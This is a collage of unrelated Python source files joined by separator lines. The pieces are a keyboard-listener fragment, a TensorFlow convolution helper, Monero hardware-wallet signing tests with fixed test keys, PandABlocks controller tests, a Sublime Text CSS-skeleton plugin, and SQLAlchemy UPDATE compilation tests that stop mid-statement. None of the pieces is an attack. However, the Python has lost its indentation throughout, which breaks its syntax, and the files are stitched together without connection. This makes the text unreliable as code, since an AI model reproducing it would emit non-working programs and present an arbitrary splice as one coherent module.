exit += 1
if exit == 5 :
return False
exit = 0
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
|
import tflib as lib
from sn import spectral_normed_weight
import numpy as np
import tensorflow as tf
_default_weightnorm = False
def enable_default_weightnorm():
global _default_weightnorm
_default_weightnorm = True
_weights_stdev = None
def set_weights_stdev(weights_stdev):
global _weights_stdev
_weights_stdev = weights_stdev
def unset_weights_stdev():
global _weights_stdev
_weights_stdev = None
def Conv2D(name, input_dim, output_dim, filter_size, inputs, he_init=True, mask_type=None, stride=1, weightnorm=None,
spectralnorm=False, update_collection=None, biases=True, gain=1.):
"""
inputs: tensor of shape (batch size, num channels, height, width)
mask_type: one of None, 'a', 'b'
returns: tensor of shape (batch size, num channels, height, width)
"""
def scope_has_variables(scope):
return len(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope.name)) > 0
#with tf.name_scope(name) as scope:
with tf.variable_scope(name) as scope:
if scope_has_variables(scope):
scope.reuse_variables()
if mask_type is not None:
mask_type, mask_n_channels = mask_type
mask = np.ones(
(filter_size, filter_size, input_dim, output_dim),
dtype='float32'
)
center = filter_size // 2
# Mask out future locations
# filter shape is (height, width, input channels, output channels)
mask[center+1:, :, :, :] = 0.
mask[center, center+1:, :, :] = 0.
# Mask out future channels
for i in xrange(mask_n_channels):
for j in xrange(mask_n_channels):
if (mask_type=='a' and i >= j) or (mask_type=='b' and i > j):
mask[
center,
center,
i::mask_n_channels,
j::mask_n_channels
] = 0.
def uniform(stdev, size):
return np.random.uniform(
low=-stdev * np.sqrt(3),
high=stdev * np.sqrt(3),
size=size
).astype('float32')
fan_in = input_dim * filter_size**2
fan_out = output_dim * filter_size**2 / (stride**2)
if mask_type is not None: # only approximately correct
fan_in /= 2.
fan_out /= 2.
if he_init:
filters_stdev = np.sqrt(4./(fan_in+fan_out))
else: # Normalized init (Glorot & Bengio)
filters_stdev = np.sqrt(2./(fan_in+fan_out))
if _weights_stdev is not None:
filter_values = uniform(
_weights_stdev,
(filter_size, filter_size, input_dim, output_dim)
)
else:
filter_values = uniform(
filters_stdev,
(filter_size, filter_size, input_dim, output_dim)
)
# print "WARNING IGNORING GAIN"
filter_values *= gain
filters = lib.param(name+'.Filters', filter_values)
if weightnorm == None:
weightnorm = _default_weightnorm
if weightnorm:
norm_values = np.sqrt(np.sum(np.square(filter_values), axis=(0,1,2)))
target_norms = lib.param(
name + '.g',
norm_values
)
with tf.name_scope('weightnorm') as scope:
norms = tf.sqrt(tf.reduce_sum(tf.square(filters), reduction_indices=[0,1,2]))
filters = filters * (target_norms / norms)
if spectralnorm:
filters = spectral_normed_weight(W=filters, update_collection=update_collection)
if mask_type is not None:
with tf.name_scope('filter_mask'):
filters = filters * mask
result = tf.nn.conv2d(
input=inputs,
filter=filters,
strides=[1, 1, stride, stride],
padding='SAME',
data_format='NCHW'
)
if biases:
_biases = lib.param(
name+'.Biases',
np.zeros(output_dim, dtype='float32')
)
result = tf.nn.bias_add(result, _biases, data_format='NCHW')
return result
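# Hedged illustration (not part of the original module): the autoregressive
# masking in Conv2D above zeroes out "future" spatial positions; mask type
# 'a' additionally masks the centre connection within a channel group. A
# numpy-only sketch for a 3x3 filter with a single channel group:
def _mask_example(filter_size=3, mask_type='a'):
    mask = np.ones((filter_size, filter_size, 1, 1), dtype='float32')
    center = filter_size // 2
    mask[center + 1:, :, :, :] = 0.       # rows below the centre
    mask[center, center + 1:, :, :] = 0.  # positions right of the centre
    if mask_type == 'a':
        mask[center, center, :, :] = 0.   # type 'a' also blocks the centre
    # for filter_size=3, mask_type='a' the spatial pattern is:
    # [[1, 1, 1],
    #  [1, 0, 0],
    #  [0, 0, 0]]
    return mask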
|
import pytest
from monero_client.monero_types import SigType, Keys
@pytest.mark.incremental
class TestSignature:
"""Monero signature test."""
@staticmethod
@pytest.fixture(autouse=True, scope="class")
def state():
sender = Keys(
public_view_key=bytes.fromhex("865cbfab852a1d1ccdfc7328e4dac90f78"
"fc2154257d07522e9b79e637326dfa"),
public_spend_key=bytes.fromhex("dae41d6b13568fdd71ec3d20c2f614c65"
"fe819f36ca5da8d24df3bd89b2bad9d"),
secret_view_key=bytes.fromhex("0f3fe25d0c6d4c94dde0c0bcc214b233e9"
"c72927f813728b0f01f28f9d5e1201"),
secret_spend_key=bytes.fromhex("3b094ca7218f175e91fa2402b4ae239a2"
"fe8262792a3e718533a1a357a1e4109"),
addr="5A8FgbMkmG2e3J41sBdjvjaBUyz8qHohsQcGtRf63qEUTMBvmA45fpp5pSa"
"cMdSg7A3b71RejLzB8EkGbfjp5PELVHCRUaE"
)
receiver = Keys(
public_view_key=bytes.fromhex("2e49ad29a1bfd98ab05c88713463d55212"
"0906b1be380211745695134e183ed0"),
public_spend_key=bytes.fromhex("392c4432e5a15aea227e6579a8da7d9f4"
"6fb78565e18e7f0b278f3f1a1468696"),
secret_view_key=bytes.fromhex("57fd02a94c7486722b1f9798dc0fb931d5"
"477a605a6fd6593573b438c02a890f"),
secret_spend_key=None,
addr="53zomVuwRkDgAQDY6qKUP6TeBy5JqXSJzhG4i7447yMXS7wdt4hKh6gQCTT"
"a9FiYNpEjBoHZ9iTww3vL96P1hcmTQXvpFAo"
)
return {"sender": sender,
"receiver": receiver,
"amount": 10**12, # 1.0 XMR
"tx_pub_key": None,
"_tx_priv_key": None,
"_ak_amount": [],
"blinded_amount": [],
"blinded_mask": [],
"y": []}
@staticmethod
def test_set_sig(monero):
major, minor, patch = monero.reset_and_get_version(
monero_client_version=b"0.17.0.0"
) # type: int, int, int
assert (major, minor) == (1, 7) # version of the Monero app
sig_mode: SigType = monero.set_signature_mode(sig_type=SigType.REAL)
assert sig_mode == SigType.REAL
@staticmethod
def test_open_tx(monero, state):
(tx_pub_key,
_tx_priv_key,
fake_view_key,
fake_spend_key) = monero.open_tx() # type: bytes, bytes, bytes, bytes
assert fake_view_key == b"\x00" * 32
assert fake_spend_key == b"\xff" * 32
state["tx_pub_key"] = tx_pub_key
state["_tx_priv_key"] = _tx_priv_key
@staticmethod
def test_gen_txout_keys(monero, state):
_ak_amount, out_ephemeral_pub_key = monero.gen_txout_keys(
_tx_priv_key=state["_tx_priv_key"],
tx_pub_key=state["tx_pub_key"],
dst_pub_view_key=state["receiver"].public_view_key,
dst_pub_spend_key=state["receiver"].public_spend_key,
output_index=0,
is_change_addr=False,
is_subaddress=False
) # type: bytes, bytes
state["_ak_amount"].append(_ak_amount) # _ak_amount_t
@staticmethod
def test_prefix_hash(monero, button):
expected: bytes = bytes.fromhex("9a259973bf721120aceae3d8d40696c0"
"7470331e386028753123f37fee36926b")
# should ask for timelock validation
monero.prefix_hash_init(button=button, version=0, timelock=2147483650)
result: bytes = monero.prefix_hash_update(
index=1,
payload=b"",
is_last=True
)
assert result == expected
@staticmethod
def test_gen_commitment_mask(monero, state):
assert len(state["_ak_amount"]) != 0
s: bytes = monero.gen_commitment_mask(state["_ak_amount"][0])
state["y"].append(s) # y_t
@staticmethod
def test_blind(monero, state):
assert len(state["y"]) != 0
assert len(state["_ak_amount"]) != 0
blinded_mask, blinded_amount = monero.blind(
_ak_amount=state["_ak_amount"][0],
mask=state["y"][0],
amount=state["amount"],
is_short=False
) # type: bytes, bytes
mask, amount = monero.unblind(
_ak_amount=state["_ak_amount"][0],
blinded_mask=blinded_mask,
blinded_amount=blinded_amount,
is_short=False
) # type: bytes, bytes
assert state["y"][0] == mask
assert state["amount"] == int.from_bytes(amount, byteorder="big")
state["blinded_mask"].append(blinded_mask)
state["blinded_amount"].append(blinded_amount)
@staticmethod
def test_validate(monero, button, state):
assert len(state["y"]) != 0
assert len(state["_ak_amount"]) != 0
assert len(state["blinded_amount"]) != 0
assert len(state["blinded_mask"]) != 0
fee: int = 100000000 # 0.0001 XMR
# should ask for fee validation
monero.validate_prehash_init(button=button,
index=1, # start at 1
txntype=0,
txnfee=fee)
# monero_client.validate_prehash_update(
# index=1,
# is_short=False,
# is_change_addr=False,
# is_subaddress=False,
# dst_pub_view_key=state["receiver"].public_view_key,
# dst_pub_spend_key=state["receiver"].public_spend_key,
# _ak_amount=state["_ak_amount"][0],
# commitment=...,
# blinded_amount=state["blinded_amount"][0],
# blinded_mask=state["blinded_mask"][0],
# is_last=True
# )
@staticmethod
def test_close_tx(monero):
monero.close_tx()
|
import unittest
from collections import OrderedDict
from mock import ANY, Mock
from malcolm.core import (
Alarm,
BooleanMeta,
ChoiceMeta,
NumberMeta,
Process,
Queue,
StringMeta,
Subscribe,
TimeStamp,
)
from malcolm.modules.pandablocks.controllers.pandablockcontroller import (
PandABlockController,
)
from malcolm.modules.pandablocks.pandablocksclient import BlockData, FieldData
class PandABoxBlockMakerTest(unittest.TestCase):
def setUp(self):
self.client = Mock()
self.process = Process()
self.process.start()
def tearDown(self):
self.process.stop()
def test_block_fields_adder(self):
fields = OrderedDict()
block_data = BlockData(2, "Adder description", fields)
fields["INPA"] = FieldData("pos_mux", "", "Input A", ["A.OUT", "B.OUT"])
fields["INPB"] = FieldData("pos_mux", "", "Input B", ["A.OUT", "B.OUT"])
fields["DIVIDE"] = FieldData(
"param", "enum", "Divide output", ["/1", "/2", "/4"]
)
fields["OUT"] = FieldData("pos_out", "", "Output", ["No", "Capture"])
fields["HEALTH"] = FieldData("read", "enum", "What's wrong", ["OK", "Very Bad"])
o = PandABlockController(self.client, "MRI", "ADDER1", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:ADDER1")
assert list(b) == [
"meta",
"health",
"icon",
"label",
"help",
"inputs",
"inpa",
"inpb",
"parameters",
"divide",
"outputs",
"out",
]
group = b.inputs
assert group.meta.tags == ["widget:group", "config:1"]
inpa = b.inpa
assert inpa.meta.writeable is True
assert inpa.meta.typeid == ChoiceMeta.typeid
assert inpa.meta.tags == [
"group:inputs",
"sinkPort:int32:ZERO",
"widget:combo",
"config:1",
]
assert inpa.meta.choices == ["A.OUT", "B.OUT"]
inpa.put_value("A.OUT")
self.client.set_field.assert_called_once_with("ADDER1", "INPA", "A.OUT")
self.client.reset_mock()
divide = b.divide
assert divide.meta.writeable is True
assert divide.meta.typeid == ChoiceMeta.typeid
assert divide.meta.tags == ["group:parameters", "widget:combo", "config:1"]
assert divide.meta.choices == ["/1", "/2", "/4"]
out = b.out
assert out.meta.writeable is False
assert out.meta.typeid == NumberMeta.typeid
assert out.meta.dtype == "int32"
assert out.meta.tags == [
"group:outputs",
"sourcePort:int32:ADDER1.OUT",
"widget:textupdate",
]
queue = Queue()
subscribe = Subscribe(path=["MRI:ADDER1", "out"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get(timeout=1)
assert delta.changes[0][1]["value"] == 0
ts = TimeStamp()
o.handle_changes({"OUT": "145"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], 145],
[["timeStamp"], ts],
]
subscribe = Subscribe(path=["MRI:ADDER1", "health"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get(timeout=1)
assert delta.changes[0][1]["value"] == "OK"
ts = TimeStamp()
o.handle_changes({"HEALTH": "Very Bad"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], "Very Bad"],
[["alarm"], Alarm.major("Very Bad")],
[["timeStamp"], ts],
]
o.handle_changes({"HEALTH": "OK"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], "OK"],
[["alarm"], Alarm.ok],
[["timeStamp"], ts],
]
def test_block_fields_pulse(self):
fields = OrderedDict()
block_data = BlockData(4, "Pulse description", fields)
fields["DELAY"] = FieldData("time", "", "Time", [])
fields["INP"] = FieldData("bit_mux", "", "Input", ["ZERO", "X.OUT", "Y.OUT"])
fields["OUT"] = FieldData("bit_out", "", "Output", [])
fields["ERR_PERIOD"] = FieldData("read", "bit", "Error", [])
o = PandABlockController(self.client, "MRI", "PULSE2", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:PULSE2")
assert list(b) == [
"meta",
"health",
"icon",
"label",
"help",
"parameters",
"delay",
"delayUnits",
"inputs",
"inp",
"inpDelay",
"outputs",
"out",
"readbacks",
"errPeriod",
]
assert b.meta.label == "Pulse description 2"
assert b.label.value == "Pulse description 2"
# check setting label
b.label.put_value("A new label")
assert b.meta.label == "A new label"
assert b.label.value == "A new label"
self.client.set_field.assert_called_once_with(
"*METADATA", "LABEL_PULSE2", "A new label"
)
self.client.set_field.reset_mock()
# check updated with nothing
o.handle_changes(dict(LABEL=""), ts=TimeStamp())
assert b.meta.label == "Pulse description 2"
assert b.label.value == "Pulse description 2"
self.client.set_field.assert_not_called()
# check updated with something from the server
o.handle_changes(dict(LABEL="A server label"), ts=TimeStamp())
assert b.meta.label == "A server label"
assert b.label.value == "A server label"
self.client.set_field.assert_not_called()
help = b.help
assert help.value == "/docs/build/pulse_doc.html"
delay = b.delay
assert delay.meta.writeable is True
assert delay.meta.typeid == NumberMeta.typeid
assert delay.meta.dtype == "float64"
assert delay.meta.tags == ["group:parameters", "widget:textinput", "config:2"]
units = b.delayUnits
assert units.meta.writeable is True
assert units.meta.typeid == ChoiceMeta.typeid
assert units.meta.tags == ["group:parameters", "widget:combo", "config:1"]
assert units.meta.choices == ["s", "ms", "us"]
inp = b.inp
assert inp.meta.writeable is True
assert inp.meta.typeid == ChoiceMeta.typeid
assert inp.meta.tags == [
"group:inputs",
"sinkPort:bool:ZERO",
"widget:combo",
"badgevalue:plus:inpDelay:MRI:PULSE2",
"config:1",
]
assert inp.meta.choices == ["ZERO", "X.OUT", "Y.OUT"]
delay = b.inpDelay
assert delay.meta.writeable is True
assert delay.meta.typeid == NumberMeta.typeid
assert delay.meta.dtype == "uint8"
assert delay.meta.tags == ["group:inputs", "widget:textinput", "config:1"]
out = b.out
assert out.meta.writeable is False
assert out.meta.typeid == BooleanMeta.typeid
assert out.meta.tags == [
"group:outputs",
"sourcePort:bool:PULSE2.OUT",
"widget:led",
]
err = b.errPeriod
assert err.meta.writeable is False
assert err.meta.typeid == BooleanMeta.typeid
assert err.meta.tags == ["group:readbacks", "widget:led"]
queue = Queue()
subscribe = Subscribe(path=["MRI:PULSE2", "inp"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get()
assert delta.changes[0][1]["value"] == "ZERO"
ts = TimeStamp()
o.handle_changes({"INP": "X.OUT"}, ts)
delta = queue.get()
assert delta.changes == [
[["value"], "X.OUT"],
[["timeStamp"], ts],
[
["meta", "tags"],
[
"group:inputs",
"sinkPort:bool:ZERO",
"widget:combo",
"badgevalue:plus:inpDelay:MRI:PULSE2",
"config:1",
"linkedvalue:out:MRI:X",
],
],
]
def test_block_fields_lut(self):
fields = OrderedDict()
block_data = BlockData(8, "Lut description", fields)
fields["FUNC"] = FieldData("param", "lut", "Function", [])
o = PandABlockController(self.client, "MRI", "LUT3", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:LUT3")
func = b.func
assert func.meta.writeable is True
assert func.meta.typeid == StringMeta.typeid
assert func.meta.tags == ["group:parameters", "widget:textinput", "config:1"]
queue = Queue()
subscribe = Subscribe(path=["MRI:LUT3"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get()
assert delta.changes[0][1]["func"]["value"] == ""
assert '<path id="OR"' in delta.changes[0][1]["icon"]["value"]
# This is the correct FUNC.RAW value for !A&!B&!C&!D&!E
self.client.get_field.return_value = "1"
ts = TimeStamp()
o.handle_changes({"FUNC": "!A&!B&!C&!D&!E"}, ts)
self.client.get_field.assert_called_once_with("LUT3", "FUNC.RAW")
delta = queue.get()
assert delta.changes == [
[["func", "value"], "!A&!B&!C&!D&!E"],
[["func", "timeStamp"], ts],
[["icon", "value"], ANY],
[["icon", "timeStamp"], ts],
]
assert '<path id="OR"' not in delta.changes[2][1]
|
import sublime, sublime_plugin
import re
class CreateCssCommand(sublime_plugin.WindowCommand):
def run(self):
# gets current html file
htmlFileName = self.window.active_view().file_name()
if htmlFileName[-4:] == 'html':
htmlFile = open(htmlFileName)
classDeclarations = []
cssSheet = ""
for line in htmlFile:
try:
# finds class attribute and remembers the beginning of its value
matchOfBegin = re.search('class=[\'|\"]{1}', line)
rawCoughtText = line[matchOfBegin.end():]
# counting indentation
try:
indentationMatch = re.search('^[\s]+', line)
lenOfIndentation = indentationMatch.end() - indentationMatch.start()
except:
lenOfIndentation = 0
# finds the end of class attribute value
matchOfEnd = re.search('[\'|\"]{1}', rawCoughtText)
rawClassNames = rawCoughtText[:matchOfEnd.start()]
# for the case if we have more than one class
try:
classNames = ''
classNamesList = rawClassNames.split()
for name in classNamesList:
classNames = classNames + '.' + name
classDeclarations.append((classNames, lenOfIndentation))
except:
continue
except:
continue
# if the first element with class has an indentation,
# it will shift all indentations with this correction
indentationCorrection = classDeclarations[0][1]
# creates css skeleton with found classes
for className, indentationsNum in classDeclarations:
if indentationCorrection:
indentationsNum = indentationsNum - indentationCorrection
cssSheet = cssSheet + ' ' * indentationsNum + className + ' ' + "{}\n"
# creates a new file, sets css syntax highlight
# and writes created css skeleton
newCssFile = self.window.new_file()
newCssFile.set_syntax_file('Packages/CSS/CSS.tmLanguage')
newCssFile.run_command("insert_snippet", {"contents": cssSheet})
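# Hedged standalone sketch (not part of the plugin): the two-step regex
# extraction used above, reduced to a plain function. The sample markup in
# the comment is an illustrative assumption.
def _extract_class_names(line):
    begin = re.search('class=[\'|\"]{1}', line)
    rest = line[begin.end():]
    end = re.search('[\'|\"]{1}', rest)
    return rest[:end.start()].split()
# e.g. _extract_class_names('<div class="nav main">') -> ['nav', 'main']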
|
from sqlalchemy import bindparam
from sqlalchemy import column
from sqlalchemy import exc
from sqlalchemy import exists
from sqlalchemy import ForeignKey
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import literal
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import update
from sqlalchemy import util
from sqlalchemy.dialects import mysql
from sqlalchemy.engine import default
from sqlalchemy.sql import operators
from sqlalchemy.sql.elements import BooleanClauseList
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class _UpdateFromTestBase(object):
@classmethod
def define_tables(cls, metadata):
Table(
"mytable",
metadata,
Column("myid", Integer),
Column("name", String(30)),
Column("description", String(50)),
)
Table(
"myothertable",
metadata,
Column("otherid", Integer),
Column("othername", String(30)),
)
Table(
"users",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("name", String(30), nullable=False),
)
Table(
"addresses",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("name", String(30), nullable=False),
Column("email_address", String(50), nullable=False),
)
Table(
"dingalings",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("address_id", None, ForeignKey("addresses.id")),
Column("data", String(30)),
)
Table(
"update_w_default",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("ycol", Integer, key="y"),
Column("data", String(30), onupdate=lambda: "hi"),
)
@classmethod
def fixtures(cls):
return dict(
users=(
("id", "name"),
(7, "jack"),
(8, "ed"),
(9, "fred"),
(10, "chuck"),
),
addresses=(
("id", "user_id", "name", "email_address"),
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed@wood.com"),
(3, 8, "x", "ed@bettyboop.com"),
(4, 8, "x", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
),
dingalings=(
("id", "address_id", "data"),
(1, 2, "ding 1/2"),
(2, 5, "ding 2/5"),
),
)
class UpdateTest(_UpdateFromTestBase, fixtures.TablesTest, AssertsCompiledSQL):
__dialect__ = "default_enhanced"
def test_update_literal_binds(self):
table1 = self.tables.mytable
stmt = (
table1.update().values(name="jack").where(table1.c.name == "jill")
)
self.assert_compile(
stmt,
"UPDATE mytable SET name='jack' WHERE mytable.name = 'jill'",
literal_binds=True,
)
def test_correlated_update_one(self):
table1 = self.tables.mytable
# test against a straight text subquery
u = update(
table1,
values={
table1.c.name: text(
"(select name from mytable where id=mytable.id)"
)
},
)
self.assert_compile(
u,
"UPDATE mytable SET name=(select name from mytable "
"where id=mytable.id)",
)
def test_correlated_update_two(self):
table1 = self.tables.mytable
mt = table1.alias()
u = update(
table1,
values={
table1.c.name: select([mt.c.name], mt.c.myid == table1.c.myid)
},
)
self.assert_compile(
u,
"UPDATE mytable SET name=(SELECT mytable_1.name FROM "
"mytable AS mytable_1 WHERE "
"mytable_1.myid = mytable.myid)",
)
def test_correlated_update_three(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test against a regular constructed subquery
s = select([table2], table2.c.otherid == table1.c.myid)
u = update(table1, table1.c.name == "jack", values={table1.c.name: s})
self.assert_compile(
u,
"UPDATE mytable SET name=(SELECT myothertable.otherid, "
"myothertable.othername FROM myothertable WHERE "
"myothertable.otherid = mytable.myid) "
"WHERE mytable.name = :name_1",
)
def test_correlated_update_four(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test a non-correlated WHERE clause
s = select([table2.c.othername], table2.c.otherid == 7)
u = update(table1, table1.c.name == s.scalar_subquery())
self.assert_compile(
u,
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description WHERE mytable.name = "
"(SELECT myothertable.othername FROM myothertable "
"WHERE myothertable.otherid = :otherid_1)",
)
def test_correlated_update_five(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test one that is actually correlated...
s = select([table2.c.othername], table2.c.otherid == table1.c.myid)
u = table1.update(table1.c.name == s.scalar_subquery())
self.assert_compile(
u,
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description WHERE mytable.name = "
"(SELECT myothertable.othername FROM myothertable "
"WHERE myothertable.otherid = mytable.myid)",
)
def test_correlated_update_six(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test correlated FROM implicit in WHERE and SET clauses
u = (
table1.update()
.values(name=table2.c.othername)
.where(table2.c.otherid == table1.c.myid)
)
self.assert_compile(
u,
"UPDATE mytable SET name=myothertable.othername "
"FROM myothertable WHERE myothertable.otherid = mytable.myid",
)
def test_correlated_update_seven(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
u = (
table1.update()
.values(name="foo")
.where(table2.c.otherid == table1.c.myid)
)
# this is the "default_enhanced" compiler. there's no UPDATE FROM
# in the base compiler.
# See also test/dialect/mssql/test_compiler->test_update_from().
self.assert_compile(
u,
"UPDATE mytable SET name=:name "
"FROM myothertable WHERE myothertable.otherid = mytable.myid",
)
def test_binds_that_match_columns(self):
"""test bind params named after column names
replace the normal SET/VALUES generation."""
t = table("foo", column("x"), column("y"))
u = t.update().where(t.c.x == bindparam("x"))
assert_raises(exc.CompileError, u.compile)
self.assert_compile(u, "UPDATE foo SET WHERE foo.x = :x", params={})
assert_raises(exc.CompileError, u.values(x=7).compile)
self.assert_compile(
u.values(y=7), "UPDATE foo SET y=:y WHERE foo.x = :x"
)
assert_raises(
exc.CompileError, u.values(x=7).compile, column_keys=["x", "y"]
)
assert_raises(exc.CompileError, u.compile, column_keys=["x", "y"])
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x) WHERE foo.x = :x",
)
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x) WHERE foo.x = :x",
params={"x": 1},
)
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x), y=:y WHERE foo.x = :x",
params={"x": 1, "y": 2},
)
def test_labels_no_collision(self):
t = table("foo", column("id"), column("foo_id"))
self.assert_compile(
t.update().where(t.c.id == 5),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :id_1",
)
self.assert_compile(
t.update().where(t.c.id == bindparam(key=t.c.id._label)),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :foo_id_1",
)
def test_labels_no_collision_index(self):
"""test for [ticket:4911] """
t = Table(
"foo",
MetaData(),
Column("id", Integer, index=True),
Column("foo_id", Integer),
)
self.assert_compile(
t.update().where(t.c.id == 5),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :id_1",
)
self.assert_compile(
t.update().where(t.c.id == bindparam(key=t.c.id._label)),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :foo_id_1",
)
def test_inline_defaults(self):
m = MetaData()
foo = Table("foo", m, Column("id", Integer))
t = Table(
"test",
m,
Column("col1", Integer, onupdate=func.foo(1)),
Column(
"col2",
Integer,
onupdate=select([func.coalesce(func.max(foo.c.id))]),
),
Column("col3", String(30)),
)
self.assert_compile(
t.update(inline=True, values={"col3": "foo"}),
"UPDATE test SET col1=foo(:foo_1), col2=(SELECT "
"coalesce(max(foo.id)) AS coalesce_1 FROM foo), "
"col3=:col3",
)
def test_update_1(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 7),
"UPDATE mytable SET name=:name WHERE mytable.myid = :myid_1",
params={table1.c.name: "fred"},
)
def test_update_2(self):
table1 = self.tables.mytable
self.assert_compile(
table1.update()
.where(table1.c.myid == 7)
.values({table1.c.myid: 5}),
"UPDATE mytable SET myid=:myid WHERE mytable.myid = :myid_1",
checkparams={"myid": 5, "myid_1": 7},
)
def test_update_3(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 7),
"UPDATE mytable SET name=:name WHERE mytable.myid = :myid_1",
params={"name": "fred"},
)
def test_update_4(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, values={table1.c.name: table1.c.myid}),
"UPDATE mytable SET name=mytable.myid",
)
def test_update_5(self):
table1 = self.tables.mytable
self.assert_compile(
update(
table1,
whereclause=table1.c.name == bindparam("crit"),
values={table1.c.name: "hi"},
),
"UPDATE mytable SET name=:name WHERE mytable.name = :crit",
params={"crit": "notthere"},
checkparams={"crit": "notthere", "name": "hi"},
)
def test_update_6(self):
table1 = self.tables.mytable
self.assert_compile(
update(
table1,
table1.c.myid == 12,
values={table1.c.name: table1.c.myid},
),
"UPDATE mytable "
"SET name=mytable.myid, description=:description "
"WHERE mytable.myid = :myid_1",
params={"description": "test"},
checkparams={"description": "test", "myid_1": 12},
)
def test_update_7(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 12, values={table1.c.myid: 9}),
"UPDATE mytable "
"SET myid=:myid, description=:description "
"WHERE mytable.myid = :myid_1",
params={"myid_1": 12, "myid": 9, "description": "test"},
)
def test_update_8(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 12),
"UPDATE mytable SET myid=:myid WHERE mytable.myid = :myid_1",
params={"myid": 18},
checkparams={"myid": 18, "myid_1": 12},
)
def test_update_9(self):
table1 = self.tables.mytable
s = table1.update(table1.c.myid == 12, values={table1.c.name: "lala"})
c = s.compile(column_keys=["id", "name"])
eq_(str(s), str(c))
def test_update_10(self):
table1 = self.tables.mytable
v1 = {table1.c.name: table1.c.myid}
v2 = {table1.c.name: table1.c.name + "foo"}
self.assert_compile(
update(table1, table1.c.myid == 12, values=v1).values(v2),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"description=:description "
"WHERE mytable.myid = :myid_1",
params={"description": "test"},
)
def test_update_11(self):
table1 = self.tables.mytable
values = {
table1.c.name: table1.c.name + "lala",
table1.c.myid: func.do_stuff(table1.c.myid, literal("hoho")),
}
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
values=values,
),
"UPDATE mytable "
"SET "
"myid=do_stuff(mytable.myid, :param_1), "
"name=(mytable.name || :name_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_unconsumed_names_kwargs(self):
t = table("t", column("x"), column("y"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: z",
t.update().values(x=5, z=5).compile,
)
def test_unconsumed_names_values_dict(self):
t = table("t", column("x"), column("y"))
t2 = table("t2", column("q"), column("z"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: j",
t.update()
.values(x=5, j=7)
.values({t2.c.z: 5})
.where(t.c.x == t2.c.q)
.compile,
)
def test_unconsumed_names_kwargs_w_keys(self):
t = table("t", column("x"), column("y"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: j",
t.update().values(x=5, j=7).compile,
column_keys=["j"],
)
def test_update_ordered_parameters_1(self):
table1 = self.tables.mytable
# Confirm that values can be passed as a list of (column, value) pairs;
# note these are ordered *differently* from table.c
values = [
(table1.c.name, table1.c.name + "lala"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
]
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
preserve_parameter_order=True,
values=values,
),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"myid=do_stuff(mytable.myid, :param_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_update_ordered_parameters_2(self):
table1 = self.tables.mytable
# Confirm that values can be passed as a list of (column, value) pairs;
# note these are ordered *differently* from table.c
values = [
(table1.c.name, table1.c.name + "lala"),
("description", "some desc"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
]
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
